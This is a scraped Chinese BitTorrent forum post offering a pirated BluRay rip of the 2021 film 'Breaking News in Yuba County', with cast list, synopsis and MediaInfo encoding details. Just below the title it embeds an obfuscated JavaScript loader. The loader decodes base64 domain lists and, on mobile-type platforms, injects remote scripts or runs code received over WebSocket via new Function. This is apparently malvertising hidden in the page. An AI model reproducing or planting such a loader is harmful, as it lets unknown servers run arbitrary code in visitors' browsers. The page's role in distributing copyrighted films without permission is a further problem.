尤巴县突发新闻[双语字幕]Breaking.News.in.Yuba.County.2021.1080p.BluRay.x264.DTS-迅雷下载 9.19GB

版主小s 18天前 174

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x49\x6e\x58\x62\x4c\x54\x4c\x79\x4d\x72']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('uawei')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXdoeWVlaGdoYS5ndWlydWktY2xvdGhlcy5jbb20saHR0cHM6Ly9vYnk2aTg3NjZqZjEuYnVqaWFuZ2ppdTEyMy5jbb20saHR0cHM6Ly9vNzdkMjM0a2RrZmhoLnNwYXJreWluY2h1bbi5jbb20saHR0cHM6Ly9vZmhnODg3MmozODRqZGpmLnRoLW1ha2UuY29tLGh0dHBzOi8vbbzM5ZmoyM2pqZDIzOGUueGlqaS1leHByZXNzLmNvbbQ==','d3NNzOi8vd3NN5ZC53c3RlbnNN5cy5jb206OTg2NNix3c3M6Ly93c2R4LndzdGVuc3JzLmNNvbTo5ODY2LHdzczovL3dzbXIud3NN0ZW5zZGYuY29tOjk4NNjY=',window,document,['b','N']);}:function(){};

◎译 名 尤巴县突发新闻 / 尤巴猛料

◎片 名 Breaking News In Yuba County

◎年 代 2021

◎产 地 英国 / 美国

◎类 别 喜剧 / 犯罪

◎语 言 英语

◎上映日期 2021-02-12(美国网络)

◎IMDb链接 https://www.imdb.com/title/tt7737640/

◎豆瓣评分 6.6/10 (857人评价)

◎豆瓣链接 https://movie.douban.com/subject/30362825/

◎片 长 96分钟

◎导 演 泰特·泰勒 Tate Taylor (id:1299015)

◎编 剧 阿曼达·伊多科 Amanda Idoko (id:1411628)

◎演 员 艾莉森·珍妮 Allison Janney (id:1041139)

米拉·库尼斯 Mila Kunis (id:1003481)

奥卡菲娜 Awkwafina (id:1360857)

旺达·塞克丝 Wanda Sykes (id:1032053)

马修·莫迪恩 Matthew Modine (id:1002720)

萨米拉·威利 Samira Wiley (id:1331705)

艾伦·巴金 Ellen Barkin (id:1000069)

朱丽叶特·刘易斯 Juliette Lewis (id:1017914)

雷吉娜·赫尔 Regina Hall (id:1036471)

吉米·辛普森 Jimmi Simpson (id:1040576)

克里斯·劳威尔 Chris Lowell (id:1027250)

小克利夫顿·克林斯 Clifton Collins Jr. (id:1019033)

布里奇特·埃弗里特 Bridget Everett (id:1382886)

马塞拉·伦茨·波普 Marcella Lentz-Pope (id:1372365)

多米尼克·伯吉斯 Dominic Burgess (id:1179706)

露西·浮士德 Lucy Faust (id:1382870)

申庚 Keong Sim (id:1326618)

西尔维娅·格雷丝·克里姆 Sylvia Grace Crim (id:1400840)

迪内·泰勒 Deneen Tyler (id:1361513)

T·C·马特恩 T.C. Matherne (id:1400846)

彼得·詹梅斯 Peter Jaymes Jr. (id:1382871)

◎标 签 黑色幽默 / 喜剧 / 犯罪 / 美国 / 2021 / 剧情 / 美国电影 / 电影

◎简 介

苏·宝特姆斯(珍妮饰)将丈夫与一个女子捉奸在床,却没成想,她的丈夫被吓到心脏病发离世。苏随即把丈夫尸身埋掉。老公的消失,倒是让苏的名望、地位日益增长。但是苏很快发现,她自己不仅要躲避警察和罪犯,更要对她那迫切想要获得猛料的新闻主播妹妹南希三缄其口。

  1. General

  2. Unique ID : 70173836316576156587616323085528310250 (0x34CAFD40A1E55D4EEF92C80CCF95A1EA)

  3. Complete name : [email protected]QDDQ.COM.mkv

  4. Format : Matroska

  5. Format version : Version 4

  6. File size : 9.19 GiB

  7. Duration : 1 h 36 min

  8. Overall bit rate : 13.6 Mb/s

  9. Encoded date : UTC 2021-07-13 04:49:15

  10. Writing application : mkvmerge v56.1.0 ('My Friend') 64-bit

  11. Writing library : libebml v1.4.2 + libmatroska v1.6.4


  12. Video

  13. ID : 1

  14. Format : AVC

  15. Format/Info : Advanced Video Codec

  16. Format profile : [email protected]

  17. Format settings : CABAC / 4 Ref Frames

  18. Format settings, CABAC : Yes

  19. Format settings, Reference frames : 4 frames

  20. Codec ID : V_MPEG4/ISO/AVC

  21. Duration : 1 h 36 min

  22. Bit rate : 12.0 Mb/s

  23. Width : 1 920 pixels

  24. Height : 804 pixels

  25. Display aspect ratio : 2.40:1

  26. Frame rate mode : Constant

  27. Frame rate : 23.976 (24000/1001/53354) FPS

  28. Color space : YUV

  29. Chroma subsampling : 4:2:0

  30. Bit depth : 8 bits

  31. Scan type : Progressive

  32. Bits/(Pixel*Frame) : 0.325

  33. Stream size : 8.10 GiB (88%)

  34. Writing library : x264 core 161 r3048+53M 0749c36 t_mod_New [(8 & 10)[email protected] X86_64]

  35. Encoding settings : cabac=1 / ref=4 / deblock=1:-3:-3 / analyse=0x3:0x133 / me=umh / subme=11 / psy=1 / fade_compensate=0.00 / psy_rd=1.00:0.00 / mixed_ref=1 / me_range=48 / chroma_me=1 / trellis=2 / 8x8dct=1 / cqm=0 / deadzone=21,11 / fast_pskip=0 / chroma_qp_offset=-3 / threads=24 / lookahead_threads=4 / sliced_threads=0 / nr=0 / decimate=0 / interlaced=0 / NTMzNTQ= / bluray_compat=0 / constrained_intra=0 / fgo=0 / bframes=8 / b_pyramid=2 / b_adapt=2 / b_bias=0 / direct=3 / weightb=1 / open_gop=0 / weightp=2 / keyint=240 / keyint_min=1 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / intra_refresh=0 / rc_lookahead=72 / rc=crf / mbtree=0 / crf=15.5000 / qcomp=0.60 / qpmin=0:0:0 / qpmax=69:69:69 / qpstep=4 / vbv_maxrate=62500 / vbv_bufsize=78125 / crf_max=0.0 / nal_hrd=none / filler=0 / NTMzNTQ=LmsMAP37EqsCpk / ip_ratio=1.40 / pb_ratio=1.30 / aq=3:0.85 / aq-sensitivity=10.00 / aq-factor=1.00:1.00:1.00 / aq2=0 / aq3=0

  36. Language : English

  37. Default : Yes

  38. Forced : No


  39. Audio

  40. ID : 2

  41. Format : DTS

  42. Format/Info : Digital Theater Systems

  43. Codec ID : A_DTS

  44. Duration : 1 h 36 min

  45. Bit rate mode : Constant

  46. Bit rate : 1 509 kb/s

  47. Channel(s) : 6 channels

  48. Channel layout : C L R Ls Rs LFE

  49. Sampling rate : 48.0 kHz

  50. Frame rate : 93.750 FPS (512 SPF)

  51. Bit depth : 24 bits

  52. Compression mode : Lossy

  53. Stream size : 1.02 GiB (11%)

  54. Title : eng

  55. Language : English

  56. Default : Yes

  57. Forced : No


  58. Text #1

  59. ID : 3

  60. Format : PGS

  61. Muxing mode : zlib

  62. Codec ID : S_HDMV/PGS

  63. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  64. Duration : 1 h 29 min

  65. Bit rate : 66.5 kb/s

  66. Count of elements : 2968

  67. Stream size : 42.3 MiB (0%)

  68. Title : chs&eng

  69. Language : Chinese

  70. Default : Yes

  71. Forced : No


  72. Text #2

  73. ID : 4

  74. Format : PGS

  75. Muxing mode : zlib

  76. Codec ID : S_HDMV/PGS

  77. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  78. Duration : 1 h 29 min

  79. Bit rate : 66.8 kb/s

  80. Count of elements : 2968

  81. Stream size : 42.6 MiB (0%)

  82. Title : cht&eng

  83. Language : Chinese

  84. Default : No

  85. Forced : No


  86. Text #3

  87. ID : 5

  88. Format : PGS

  89. Muxing mode : zlib

  90. Codec ID : S_HDMV/PGS

  91. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  92. Duration : 1 h 29 min

  93. Bit rate : 40.5 kb/s

  94. Count of elements : 2968

  95. Stream size : 25.8 MiB (0%)

  96. Title : chs

  97. Language : Chinese

  98. Default : No

  99. Forced : No


  100. Text #4

  101. ID : 6

  102. Format : PGS

  103. Muxing mode : zlib

  104. Codec ID : S_HDMV/PGS

  105. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  106. Duration : 1 h 29 min

  107. Bit rate : 40.9 kb/s

  108. Count of elements : 2968

  109. Stream size : 26.0 MiB (0%)

  110. Title : cht

  111. Language : Chinese

  112. Default : No

  113. Forced : No


  114. Text #5

  115. ID : 7

  116. Format : PGS

  117. Muxing mode : zlib

  118. Codec ID : S_HDMV/PGS

  119. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  120. Duration : 1 h 29 min

  121. Bit rate : 53.4 kb/s

  122. Count of elements : 3844

  123. Stream size : 34.1 MiB (0%)

  124. Title : eng

  125. Language : English

  126. Default : No

  127. Forced : No


  128. Menu

  129. 00:00:00.000 : 第 01 章

  130. 00:10:21.662 : 第 02 章

  131. 00:19:52.691 : 第 03 章

  132. 00:30:21.110 : 第 04 章

  133. 00:41:30.863 : 第 05 章

  134. 00:49:46.316 : 第 06 章

  135. 00:59:59.304 : 第 07 章

  136. 01:09:49.977 : 第 08 章

  137. 01:20:31.993 : 第 09 章

  138. 01:27:46.135 : 第 10 章




此处一般会放置磁力链或电驴下载链接,不过此链接需要注册会员才能看到,点击“立即注册”
磁力链下载【磁力链接仅对注册会员开放,登陆后可见】

TAGS 犯罪 喜剧

上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回